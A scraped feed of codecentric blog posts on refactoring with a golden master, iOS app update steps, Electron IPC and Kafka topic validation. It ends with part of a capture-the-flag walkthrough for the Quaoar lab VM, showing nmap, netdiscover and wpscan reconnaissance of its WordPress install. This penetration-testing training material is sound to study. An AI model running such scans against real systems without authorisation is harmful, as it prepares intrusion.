    const checkSumMod11 = taxNumber.substr(0,8)
                                   .split('')
                                   .map(
                                       (digit, index) => {
                                       return parseInt(digit, 10) * (9 - index);
                                       })
                                   .reduce((a, b) => a + b) % 11,
          comparator = checkSumMod11 > 1? 11 - checkSumMod11 : 0;

    return parseInt(taxNumber.substr(8, 1), 10) === comparator;
}

This is where I stopped.

Writing unit tests

By now I had a better understanding of what my piece of code did. And, as was said above, it’s a good idea to get rid of a golden master, so the time had come to think about valid test inputs.

Apparently a remainder of 0 and 1 was important. To this, I added the edge case of remainder 10, and some remainder in the middle range just to be sure. As for generating the corresponding inputs, I cheated a little:

...
if (checkSumMod11 === 0 && lastDigit === comparator) {
    console.log(taxNumber);
}
...

Using this generator function, I created the final unit tests for the portugueseTaxNumberValidator:

describe('validatePortugueseTaxNumber', () => {
    it('should return false for 520363144 (case checkSum % 11 === 0) ', () => {
        expect(validatePortugueseTaxNumber('520363144')).to.equal(false);
    });

    it('should return false for 480073977 (case checkSum % 11 === 1) ', () => {
        expect(validatePortugueseTaxNumber('480073977')).to.equal(false);
    });

    it('should return false for 291932333 (case checkSum % 11 === 2) ', () => {
        expect(validatePortugueseTaxNumber('291932333')).to.equal(false);
    });

    it('should return false for 872711478 (case checkSum % 11 === 10) ', () => {
        expect(validatePortugueseTaxNumber('872711478')).to.equal(false);
    });

    it('should return true for 504917951 (case checkSum % 11 === 0) ', () => {
        expect(validatePortugueseTaxNumber('523755600')).to.equal(true);
    });

    it('should return true for 850769990 (case checkSum % 11 === 2) ', () => {
        expect(validatePortugueseTaxNumber('998757039')).to.equal(true);
    });

    it('should return true for 504917951 (case checkSum % 11 === 10) ', () => {
        expect(validatePortugueseTaxNumber('504917951')).to.equal(true);
    });
});

Conclusion

Creating a Golden Master and using it during refactoring feels like you’re wrapped in a big, fluffy cotton ball. If the Golden Master record is detailed enough, nothing can go wrong. Or rather, if it does, you will notice in an instant. There are no qualms about deleting code, replacing it with something you think will do the same, because it’s a safe experiment. It was a fun exercise and I would do it again in an instant.

The post Refactoring Algorithmic Code using a Golden Master Record appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Handling app updates in iOS/macOS apps

codecentric Blog - Wed, 13-Dec-17 22:00

function setDisplayForLang(lang, displayStyle) { var elements = document.querySelectorAll('div[class="wp_syntax"]'); for (var i = 0; i < elements.length; i++) { if (elements[i].querySelectorAll('pre[class="'+lang+'"]').length > 0) { elements[i].style.display = displayStyle; } } } function showSwift () { setDisplayForLang("objc", "none"); setDisplayForLang("scala", "block"); return false; } function showObjC () { setDisplayForLang("objc", "block"); setDisplayForLang("scala", "none"); return false; } var oldFn = window.onload; window.onload = function() { if (typeof oldFn === 'function') oldFn(); showObjC(); }

TL;DR: A solution is shown in which every app update step (one step per app version) is wrapped in its own class implementing a special AppUpdate protocol. On app launch, all classes implementing this protocol are loaded via reflection, instantiated, sorted by version number ascending and then each update step is executed if it hasn’t been already executed earlier.

One of the problems mobile engineers have to face is regular app updates. This problem is generally not new. However, we decided to present our solution to this problem because it may offer some interesting points for some.

Prior to the update, an app can have its state persisted in many ways and updating the app often requires transforming the existing data or creating new data. Two major problems exist in this scenario:

  1. we need to make sure update steps are executed even when a user skipped one or more app versions (ie user was on wild offline vacation, and in the meantime, two new app updates got released)
  2. we need to make sure update steps are executed only once (if update steps were executed every time user starts an app, it would be redundant and very likely break things)

The code demonstrating this approach is available on Bitbucket for both Swift and ObjC. Let’s quickly go through the major steps.

In the begining

Usually, we want application updates to be executed as soon as the app starts. The usual callback for that is didFinishLaunchingWithOptions in AppDelegate. So, in there we would add a line which does the app updating:

Objective-C Swift
[AppUpdater performUpdateSteps];
AppUpdater.performUpdateSteps()

Simple as that. Also, for debugging reasons, we add the following in AppDelegate, to print the simulator app’s data folder in a console:

Objective-C Swift
#if TARGET_IPHONE_SIMULATOR
    NSLog(@"Documents Directory: %@", [[[NSFileManager defaultManager] URLsForDirectory:NSDocumentDirectory inDomains:NSUserDomainMask] lastObject]);
#endif
#if (arch(i386) || arch(x86_64)) && os(iOS)
    let dirs: [String] = NSSearchPathForDirectoriesInDomains(FileManager.SearchPathDirectory.documentDirectory,
            FileManager.SearchPathDomainMask.allDomainsMask, true)
    print(dirs[dirs.endIndex - 1])
#endif

That way, we can easily track the Library/Preferences folder where the Preferences plist file is kept and delete it for easier manual testing of update steps.

AppUpdater

Now let’s look into what’s going on in AppUpdater since it does the majority of work.

Guided by SRP, we have a class for every version update. Therefore, executing app updates comes down to iterating through update class instances and executing its update step. An example is given in the code bellow:

Objective-C Swift
ASTEach(updaters, ^(id  updater) {
    if ([updater canExecuteUpdate])
    {
        [self performUpdateStepWithUpdater:updater];
    }
});
for updater in updaters {
    if updater.canExecuteUpdate() {
        performUpdateStepWithUpdater(updater)
    }
}

In case you’re wondering where the ASTEach in the ObjC example comes from, it’s from Asterism, a functional toolbelt for Objective-C.
Pretty simple. Bellow is the class diagram showing relations between AppUpdater and AppUpdate protocol which is implemented by specific updaters (v1.0.0, v1.1.0, etc.)

class diagram app updates

Each update step has its own unique identifier (more on that later). To make sure app updates execute only once, update step identifiers can be stored in UserDefaults. Before executing an update, the app would check if the update identifier already exists in UserDefaults, and only execute the update step if it doesn’t exist. All this gives us the code for an AppUpdater class:

Objective-C Swift
@implementation AppUpdater

+ (void) performUpdateSteps
{
    NSArray* updaters = @[
        [AppUpdate_001_000_000 new],
        [AppUpdate_001_001_000 new]
    ];

    updaters = ASTSort(updaters, ^NSComparisonResult(id  obj1, id  obj2) {
        return [obj1.version compare:obj2.version];
    });

    ASTEach(updaters, ^(id  updater) {
        if ([updater canExecuteUpdate])
        {
            [self performUpdateStepWithUpdater:updater];
        }
    });
}

+ (void) performUpdateStepWithUpdater:(id  const)updater
{
    if (![NSUserDefaults.standardUserDefaults objectForKey:updater.version])
    {
        NSLog(@"▸ Performing update step: %@", updater.stepName);
        updater.updateBlock();
        [NSUserDefaults.standardUserDefaults setValue:updater.stepDescription forKey:updater.version];
        NSLog(@"▸ Finished update step: %@", updater.stepName);
        [NSUserDefaults.standardUserDefaults synchronize];
    }
}

@end
class AppUpdater {

    class func performUpdateSteps() {
        let updaters = [
            AppUpdate_001_000_000(),
            AppUpdate_001_001_000()
        ]

        for updater in updaters {
            if updater.canExecuteUpdate() {
                performUpdateStepWithUpdater(updater)
            }
        }
        UserDefaults.standard.synchronize()
    }

    class func performUpdateStepWithUpdater(_ updater: AppUpdate) {
        if (UserDefaults.standard.object(forKey: updater.stepName()) == nil) {
            print("▸ Performing update step \(updater.stepName())")
            updater.updateBlock()()
            UserDefaults.standard.setValue(updater.stepDescription(), forKey: updater.stepName())
            print("▸ Finished update step: \(updater.stepName())")
        }
    }
}

The method performUpdateStepWithUpdater executes an app update step if it determines (by looking up UserDefaults) that it hasn’t been already executed. App update instances are listed in the updaters array sorted in the order in which they should be executed. Update classes are conveniently named like AppUpdate_001_001_000 where the ‘001_001_000’ suffix describes the app version like 1.1.0, supporting versions up to 999.999.999. This makes it useful for sorting app update classes in the IDE project explorer tree, but it also paves the way for another approach: instead of listing all updater classes in the array like we did:

Objective-C Swift
NSArray* updaters = @[
    [AppUpdate_001_000_000 new],
    [AppUpdate_001_001_000 new]
];
let updaters = [
    AppUpdate_001_000_000(),
    AppUpdate_001_001_000()
]

we can retrieve all classes implementing the AppUpdate protocol by reflection, so our performUpdateSteps method comes down to:

Objective-C Swift
+ (void) performUpdateSteps
{
    NSArray* updateClasses = [Reflection classesImplementingProtocol:@protocol(AppUpdate)];
    NSArray* updaters = ASTMap(updateClasses, (id (^)(id)) ^id(Class updateClass) {
        return [updateClass new];
    });

    updaters = ASTSort(updaters, ^NSComparisonResult(id  obj1, id  obj2) {
        return [obj1.version compare:obj2.version];
    });

    ASTEach(updaters, ^(id  updater) {
        if ([updater canExecuteUpdate])
        {
            [self performUpdateStepWithUpdater:updater];
        }
    });
}
class func performUpdateSteps() {
    let updateClasses = getClassesImplementingProtocol(p: AppUpdate.self)
    let updaters = updateClasses.map({ (updaterClass) -> AppUpdate in
        return updaterClass.alloc() as! AppUpdate
    }).sorted {
        $0.version() < $1.version()
    }

    for updater in updaters {
        if updater.canExecuteUpdate() {
            performUpdateStepWithUpdater(updater)
        }
    }
    UserDefaults.standard.synchronize()
}

Once classes are extracted and instantiated, they are sorted by app version to ensure proper order of update step execution. Extracting all classes implementing a given protocol happens in getClassesImplementingProtocol method in Reflection.swift or Reflection.h. The content of those files can be looked up on bitbucket.
As an effect, all the developer has to do in order to execute the new app update is to create a class implementing the AppUpdate protocol.

AppUpdate step

Every app update step has its own class implementing the AppUpdate protocol. An example implementation is given bellow:

Objective-C Swift
@implementation AppUpdate_01_001_00

- (NSString* const) version
{
    return @"001-001-000";
}

- (BOOL const) canExecuteUpdate
{
    return SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(9);
}

- (NSString* const) stepName
{
    return @"SpotlightIndexing";
}

- (NSString* const) stepDescription
{
    return @"Index documents and photos in spotlight.";
}

- (void (^)(void)) updateBlock
{
    return ^{
        // iterate through all documents and photos and index them in spotlight
    };
}

@end
class AppUpdate_001_001_000: NSObject, AppUpdate {
    func version() -> String {
        return "001-001-000"
    }

    func canExecuteUpdate() -> Bool {
        if #available(iOS 9.0, *) {
            return true
        } else {
            return false
        }
    }

    func stepName() -> String {
        return "upd-\(version())"
    }

    func stepDescription() -> String {
        return "Index documents and photos in spotlight."
    }

    func updateBlock() -> (() -> Void) {
        return {
            // EXAMPLE: iterate through all documents and photos and index them in spotlight
        }
    }
}

version method returns a string in format ###-###-### which is used to sort updaters chronologically. canExecuteUpdate is a place where the update step can decide whether to be executed or not (ie it only makes sense to execute on certain iOS versions because it relies on API introduced in relevant iOS version).
stepName returns a String which needs to be unique across all update step instances. This is because stepName String is used as a key in UserDefaults where we track which steps have been executed so far.
stepDescription is a short description of what the update step does (usually one sentence). It is stored as a value in UserDefaults.
updateBlock returns the block which does the actual job of whatever the update step should do. Some examples include:

  • resetting cached images to force the app to retrieve new shiny images from the server
  • indexing content in Spotlight
  • database scheme update / data migration in case you don't use CoreData (which you probably should), but use something like FMDB
  • complete removal of local DB and other data forcing app to retrieve everything from the server again

Benefits

  • By wrapping each update step into its own class keeps the code clean and makes unit-testing easier.
  • Adding a new update step boils down to creating one class which implements the AppUpdate protocol.

Alternatives

Alternatively to the class-based approach described in this article, a block-based approach can be used. Such an approach is used by MTMigration utility.

Useful links

https://en.wikipedia.org/wiki/Single_responsibility_principle
https://en.wikipedia.org/wiki/Reflection_(computer_programming)
https://github.com/mysterioustrousers/MTMigration

The post Handling app updates in iOS/macOS apps appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Developing modern offline apps with ReactJS, Redux and Electron – Part 4 – Electron

codecentric Blog - Sun, 10-Dec-17 23:00

The previous part of this series showed the beautiful interplay of React and Redux. In this part, we are going to take a rough look at a technology called Electron. One essential technology in our recent projects, Electron is vastly different from the previous two parts of this blog series. React and Redux are solely used to implement the application logic. Electron, on the other hand, is used to implement both structure and application logic to create real cross-platform desktop apps. It is a wrapper which contains a chromium browser in a NodeJS environment. This technology enables the combination of pure web frontend technologies and additionally gives your application full access to the underlying operating system via NodeJS. In the following, we will introduce the basic concepts using a simple Electron app and show how this technology solves the everlasting single-threaded obstacle of non-responsive JavaScript applications.

  1. Introduction
  2. ReactJS
  3. ReactJS + Redux
  4. Electron framework
  5. ES5 vs. ES6 vs. TypeScript
  6. WebPack
  7. Build, test and release process

The Core Parts

An Electron app consists of a few main parts. The basic concept is that you have two or more concurrently running processes. First you have the main process of your application. In this process you have access to NodeJS and thus all your operating system’s power and access to a huge distinct subset of the Electron API. Furthermore the main process creates browser windows. They have one or more render processes and share an important property with your normal browser. These processes are contained in a sandbox. This is because these processes are responsible for rendering the DOM of our web app. Render processes have access to the NodeJS API and a distinct subset of the Electron API, but not to the operating system.

A few functionalities of Electron can even be used in both the main and a render processes. By default JavaScript processes in NodeJS and Chromium are single-threaded and therefore still limited, even if both processes are operating system level processes.

Electron core parts Electron core parts

OS Integration

Since Electron is a JavaScript technology, the final app can be deployed to common desktop operating systems like Windows, MacOS and Linux in 32 and 64-bit versions. To do so, you can use the electron-packager, which is developed by the community. The packager creates installers for various operating systems which make it easy to deploy the Electron apps in enterprise environments. Furthermore, Electron provides essential OS integration on its ownm, menu bars, OS level notifications, file dialogs and many other features for nearly all operating systems.

In our projects we used the file dialog to import files from the file system. The allowed properties depend on the operating system. Please check out the API for more details [DIALOG].

const {dialog} = require('electron');
const properties = ['openFile', 'openDirectory’];
dialog.showOpenDialog({ properties });

We also created custom Electron menu bars for production and development mode. During development we could toggle the developer tools from chromium. For production you can remove that feature from the final Electron app.

 const createMenu = () => {
 const { app, Menu } = electron;
 const template = [
   {
     label: 'Edit',
     submenu: [ 
      { role: 'cut' }, 
      { role: 'copy' }, 
      { role: 'paste' },
      { role: 'selectall' }
    ]
   },
   {
     label: 'View',
     submenu: [ 
      { role: 'reload' },
      { role: 'forcereload' },  
      { role: 'toggledevtools' }
     ]
   }
 ];
 const menu = Menu.buildFromTemplate(template);
 Menu.setApplicationMenu(menu);
};

Electron native menu

To see a full list of all native Electron features, go to [ELECTRON].

IPC Communication

In the previous section we talked about the awesome OS integration of Electron. But how can we harness the full potential of our operating system and backend languages like NodeJS to unleash the power of JavaScript? We can do this with the built-in inter-process-communication in Electron. The modules that handle that communication, the ipcMain and ipcRenderer, are part of Electron’s core. ipcMain enables communication from the main process to the render processes. The ipcRenderer handles the opposite direction from render to main.

“The ipcRenderer module is an instance of the EventEmitter class. It provides a few methods so you can send synchronous and asynchronous messages from the render process (web page) to the main process. You can also receive replies from the main process.” [IPCRENDERER]

In the following example, we register an Event Listener with ipcMain process using the channel name LOAD_FILE_WITH_PATH. Once the Event Listener finishes, we send an event back to the React app. Depending on the result, we add a “success” or “error” to the channel name. This allows us to operate differently with the response inside React [IPCMAIN].

In the React app, we use the ipcRenderer.send to send messages asynchronously to the Event Listener, using the identical channel name. To send messages synchronously use ipcRenderer.sendSync. After that we add a one time listener function for the event using ipc.once. To distinguish IPC calls we add a unique uuid to the Channel name [IPCRENDERER].

electron.js
const ipc = require('electron').ipcMain;
ipc.on(ipcConstants.LOAD_FILE_WITH_PATH, async (event, request) => {
  try {
    const fileContent = await fileService.readFileAsync(request.path);
    event.sender.send(
      `${ipcConstants.LOAD_FILE_WITH_PATH}-success-${request.uuid}`, fileContent);
  } catch (error) {
    event.sender.send(
      `${ipcConstants.LOAD_FILE_WITH_PATH}-error-${request.uuid}`, error.message);
  }
});
fileService.js
const ipc = require('electron').ipcRenderer;
export function readFileContentFromFileSystem(path) {
  const uuid = uuidV4();
  ipc.send(LOAD_FILE_WITH_PATH, { uuid, path });
  return new Promise((resolve, reject) => {
    ipc.once(`${LOAD_FILE_WITH_PATH}-success-${uuid}`,
      (event, xml) => {
        resolve(xml);
      });
    ipc.once(`${LOAD_FILE_WITH_PATH}-error-${uuid}`,
      (event, args) => {
        reject(args);
      });
  });
}

To debug the IPC communication between your React application and Electron, you need to install the Electron DevTools Extension.

npm install --save-dev devtron

Afterwards run the following command from the console tab of your application. This will add another tab with the Devtron tools.

require('devtron').install()

Under the Devtron tab you get all kinds of details about your Electron application. Devtron displays all default event listeners from Electron as well as your own custom listeners. Under the IPC link you can record all IPC calls from your application. The Lint tab allows you to do Lint checks and the Accessibility tab checks your web application against the Accessible Rich Internet Applications Suite (ARIA) standard.

Devtron event listener

Here is an example what the IPC communication in our project looks like.

Devtron IPC call

Remember that we claimed that Electron is the end of the everlasting single-threaded obstacle? Using IPC we can move CPU intensive work to Electron and outsource these tasks using electron-remote. With one single line we can create a task pool that will actually create a new browser window in the background and execute our code (electronFileService.js) in a separate OS process / browser window. Here is an example how to setup the task pool for the file service.

const { requireTaskPool } = require('electron-remote');
const fileService = requireTaskPool(require.resolve('./electronFileService'));

Offline and Storage

When developing an offline desktop application with Electron you have several options on where to store and read data from.

Option 1: Electron / NodeJS

In Electron you can execute NodeJS commands. Therefore you can use almost any module from npmjs.org to read and store data on your local operating system. We recommend this option when you need to persist and process a lot of data.

  • SQLite3 (relational database)[SQLITE]
  • MongoDB (document database)[MONGODB]
  • Neo4J (graph database)[NEO4J]

Electron app

Option 2: React & Redux / Web Browser

In the second option we persist and process data inside the browser. Modern browsers offer a range of APIs that allow for persisting browser data, i.e. LocalStorage, IndexedDB, SessionStorage, WebSQL and Cookies. We recommend this approach for small datasets that need to be persisted locally. This can be done with any web technology. In our case, the React web application uses Redux as a store for the application state. You can use the redux-persist module to automatically persist the Redux store to the IndexedDB or LocalStorage. In case your web app crashes or you restart the browser, you can configure redux-persist [REDUXP] to automatically rehydrate the Redux Store.

React WebApp

Modern browsers support service worker API to span threads for processing data. If there is information that you need to persist and reuse across restarts, service workers have access to the various browser storage technologies.

Option 3: Combination of Option 1 and 2

There might be times when your desktop client will be online and can retrieve data from a backend server. With our proposed stack you have the full freedom of choosing how to access the backend services. You can either call the backend services via the web application layer (i.e. React WebApp) or you can use the Electron/NodeJS layer. Which way you choose is up to you and might depend on security restrictions or the existence of NodeJS modules you can reuse or other aspects.

Electron React App

Summary

Electron is an extremely powerful technology that enables you and your team to create beautiful, responsive, OS independent and maintainable desktop applications. Because there is so much more to Electron, we highly recommend reading https://electronjs.org/docs for the parts that you are interested in or need in your projects. Just keep tuned for our next article.

References

The post Developing modern offline apps with ReactJS, Redux and Electron – Part 4 – Electron appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Validating Topic Configurations in Apache Kafka

codecentric Blog - Thu, 07-Dec-17 00:08

Messages in Apache Kafka are appended to (partitions of) a topic. Topics have a partition count, a replication factor and various other configuration values. Why do those matter and what could possibly go wrong?

Why does Kafka topic configuration matter?

There are three main parts that define the configuration of a Kafka topic:

  • Partition count
  • Replication factor
  • Technical configuration

The partition count defines the level of parallelism of the topic. For example, a partition count of 50 means that up to 50 consumer instances in a consumer group can process messages in parallel. The replication factor specifes how many copies of a partition are held in the cluster to enable failover in case of broker failure. And in the technical configuration, one can define the cleanup policy (deletion or log compaction), flushing of data to disk, maximum message size, permitting unclean leader elections and so on. For a complete list, see https://kafka.apache.org/documentation/#topicconfigs. Some of these properties are quite easy to change at runtime. For others this is a lot harder, though.

Let’s take the partition count. Increasing it upwards is easy – just run

bin/kafka-topics.sh --alter --zookeeper zk:2181 --topic mytopic --partitions 42

This might be sufficient for you. Or it might open the fiery gates of hell and break your application. The latter is the case if you depend on all messages for a given key landing on the same partition (to be handled by the same consumer in a group) or for example if you run a Kafka Streams application. If that application uses joins, the involved topics need to be copartitioned, meaning that they need to have the same partition count (and producers using the same partitioner, but that is hard to enforce). Even without joins, you don’t want messages with the same key end up in different KTables.

Changing the replication factor is serious business. It is not a case of simply saying “please increase the replication factor to x” as it is with the partition count. You need to completely reassign partitions to brokers, specifying the preferred leader and n replicas for each partition. It is your task to distribute those well across your cluster. This is no fun for anyone involved. Practical experience with this has actually led to this blog post.
The technical configuration has an impact as well. It could be for example quite essential that a topic is using compaction instead of deletion if an application depends on that. You also might find the retention time too small or too big.

The Evils of Automatic Topic Creation

In a recent project, a central team managed the Kafka cluster. This team kept a lot of default values in the broker configuration. This is mostly sensible as Kafka comes with pretty good defaults. However, one thing they kept was auto.create.topics.enable=true. This property means that whenever a client tries to write to or read from a non-existing topic, Kafka will automatically create it. Defaults for partition count and replication factor were kept at 1.

This led to the situation where the team forgot to set up a new topic manually before running producers and consumers. Kafka created that topic with default configuration. Once this was noticed, all applications were stopped and the topic deleted – only to be created again automatically seconds later, presumably because the team didn’t find all clients. “Ok”, they thought, “let’s fix it manually”. They increased the partition count to 32, only to realize that they had to provide the complete partition assignment map to fix the replication factor. Even with tool support from Kafka Manager, this didn’t give the team members a great feeling. Luckily, this was only a development cluster, so nothing really bad happened. But it was easy to conceive that this could also happen in production as there are no safeguards.

Another danger of automatic topic creation is the sensitivity to typos. Let’s face it – sometimes we all suffer from butterfingers. Even if you took all necessary care to correctly create a topic called “parameters”, you might end up with something like

Automatic topic creating means that your producer thinks everything is fine, and you’ll scratch your head as to why your consumers don’t receive any data.

Another conceivable issue is that a developer that maybe is not yet that familiar with the Producer API might confuse the String parameters in the send method

So while our developer meant to assign a random value to the message key, he accidentally set a random topic name. Every time a message is produced, Kafka creates a new topic.

So why don’t we just switch automatic topic creation off? Well, if you can: do it. Do it now! Sadly, the team didn’t have that option. But an idea was born – what would be the easiest way to at least fail fast at application startup when something is different than expected?

How to automatically check your topic configuration

In older versions of Kafka, we basically used the code called by the kafka-topics.sh script to programmatically work with topics. To create a topic for example we looked at how to use kafka.admin.CreateTopicCommand. This was definitely better than writing straight to Zookeeper because there is no need to replicate the logic of “which ZNode goes where”, but it always felt like a hack. And of course we got a dependency on the Kafka broker in our code – definitely not great.

Kafka 0.11 implemented KIP-117, thus providing a new type of Kafka client – org.apache.kafka.clients.admin.AdminClient. This client enables users to programmatically execute admin tasks without relying on those old internal classes or even Zookeeper – all Zookeeper tasks are executed by brokers.

With AdminClient, it’s fairly easy to query the cluster for the current configuration of a topic. For example, this is the code to find out if a topic exists and what its partition count and replication factor is:

The DescribeTopicsResult contains all the info required to find out if the topic exists and how partition count and replication factor are set. It’s asynchronous, so be prepared to work with Futures to get your info.

Getting configs like cleanup.policy works similarly, but uses a different method:

Under the hood there is the same Future-based mechanism.

A first implementation attempt

If you are in a situation where your application depends on a certain configuration for the Kafka topics you use, it might make sense to fail early when something is not right. You get instant feedback and have a chance to fix the problem. Or you might at least want to emit a warning in your log. In any case, as nice as the AdminClient is, this check is not something you should have to implement yourself in every project.

Thus, the idea for a small library was born. And since naming things is hard, it’s called “Club Topicana”.

With Club Topicana, you can check your topic configuration every time you create a Kafka Producer, Consumer or Streams client.

Expectations can be expressed programmatically or configuratively. Programmatically, it uses a builder:

This basically says “I expect the topic test_topic to exist. It should also have 32 partitions and a replication factor of 3. I also expect the cleanup policy to be delete. Kafka should retain messages for at least 30 seconds.”

Another option to specify an expected configuration is YAML (parser is included):

What do you do with those expectations? The library provides factories for all Kafka clients that mirror their public constructors and additionally expects a collection of expected topic configurations. For example, creating a producer can look like this:

The last line throws a MismatchedTopicConfigException if the actual configuration does not meet expectations. The message of that exception lists the differences. It also provides access to the computed result so users can react to it in any way they want.

The code for consumers and streams clients looks similar. Examples are available on GitHub. If all standard clients are created using Club Topicana, an exception will prevent creation of a client and thus auto creation of a topic. Even if auto creation is disabled, it might be valuable to ensure that topics have the correct configuration.

There is also a Spring client. The @EnableClubTopicana annotation triggers Club Topicana to read YAML configuration and execute the checks. You can configure if you want to just log any mismatches or if you want to let the creation of the application context fail.

This is all on GitHub and available on Maven Central.

Caveats

Club Topicana will not notice when someone changes the configuration of a topic after your application has successfully started. It also of course cannot guard against other clients doing whatever on Kafka.

Summary

The configuration of your Kafka topics is an essential part of running your Kafka applications. Wrong partition count? You might not get the parallelism you need or your streams application might not even start. Wrong replication factor? Data loss is a real possibility. Wrong cleanup policy? You might lose messages that you depend on later. Sometimes, your topics might be auto-generated and come with bad defaults that you have to fix manually. With the AdminClient introduced in Kafka 0.11, it’s simple to write a library that compares actual and desired topic configurations at application startup.

The post Validating Topic Configurations in Apache Kafka appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Penetration Test Training – Quaoar

codecentric Blog - Tue, 05-Dec-17 01:30

For anyone interested in Penetration Testing and IT Security, there is the need to test the theoretical skills you might have acquired. To give people who are interested a means to do so without violating the law, Capture-the-Flag (CTF) Images exist. A CTF challenge is (usually) a virtual machine especially crafted with security vulnerabilities in it. The flags are text files that you must discover.
Previously, we solved the LazySysAdmin CTF challenge – today we’re using the Quaoar VM from vulnhub.

To get this VM, either to tag along while reading or if you’re interested and want to solve it by yourself, download it and import it into VirtualBox. A word of advice: Never let a downloaded VM directly into your network. Use a host-only network to reach the virtual machine from your host machine.

But now, let’s get started!
Remember to save anything that looks like it’s a username or could be a password in a file. This information might be useful later on.

The Quaoar-VM is set up to use the network adapter vboxnet0. So as a first step, we need to find it on the network.

$ netdiscover -i vboxnet0
192.168.99.101

As we’ll need that IP Adress a few times, I’ll export it to save myself some typing.

$ export IP=192.168.99.101

Now we can use $IP instead of typing it out all the time.

Enumeration

To get a general overview of the target machine, the ports are enumerated with

$ nmap -A $IP

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 21:51 CET
Nmap scan report for 192.168.99.101
Host is up (0.0020s latency).
Not shown: 991 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
[...]
53/tcp  open  domain      ISC BIND 9.8.1-P1
[...]
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3        Dovecot pop3d
[...]
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: LOGINDISABLEDA0001 more IMAP4rev1 listed post-login have SASL-IR ID ENABLE STARTTLS capabilities LITERAL+ Pre-login IDLE OK LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
[...]
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: AUTH=PLAINA0001 IMAP4rev1 more post-login have SASL-IR ID ENABLE listed capabilities LITERAL+ Pre-login IDLE OK LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
[...]
995/tcp open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: PIPELINING TOP UIDL SASL(PLAIN) USER CAPA RESP-CODES
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
[...]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.6.3)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-11-06T16:51:39-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.02 seconds

So we got to know quite a lot about the system. We have open ports for ssh, http, smb and pop3 – among others. We also know there is an apache webserver running on port 80 and according to the robots.txt there is a wordpress installation.

WordPress

Let’s see what wpscan tells us about that wordpress instance:

$ wpscan --url $IP
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.99.101/wordpress/
[+] Started: Mon Nov 6 21:55:33 2017

[!] The WordPress 'http://192.168.99.101/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under: http://192.168.99.101/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.99.101/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.99.101/wordpress/wp-includes/

[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[!] 20 vulnerabilities identified from the version number

[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
Reference: https://wpvulndb.com/vulnerabilities/8716
[...]
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
Reference: https://wpvulndb.com/vulnerabilities/8718
[...]
[i] Fixed in: 3.9.15

[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default 
Reference: https://wpvulndb.com/vulnerabilities/8719 
[...]
[i] Fixed in: 3.9.15 

[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF) 
Reference: https://wpvulndb.com/vulnerabilities/8720
[...]
[i] Fixed in: 3.9.15 

[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG) 
Reference: https://wpvulndb.com/vulnerabilities/8721 
[...]
[i] Fixed in: 3.9.15 

[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection 
Reference: https://wpvulndb.com/vulnerabilities/8730 
[...]
[i] Fixed in: 3.9.16 

[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata 
Reference: https://wpvulndb.com/vulnerabilities/8765 
[...]
[i] Fixed in: 3.9.17 

[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation 
Reference: https://wpvulndb.com/vulnerabilities/8766 
[...]
[i] Fixed in: 3.9.17 

[!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset 
Reference: https://wpvulndb.com/vulnerabilities/8807 
[...] 

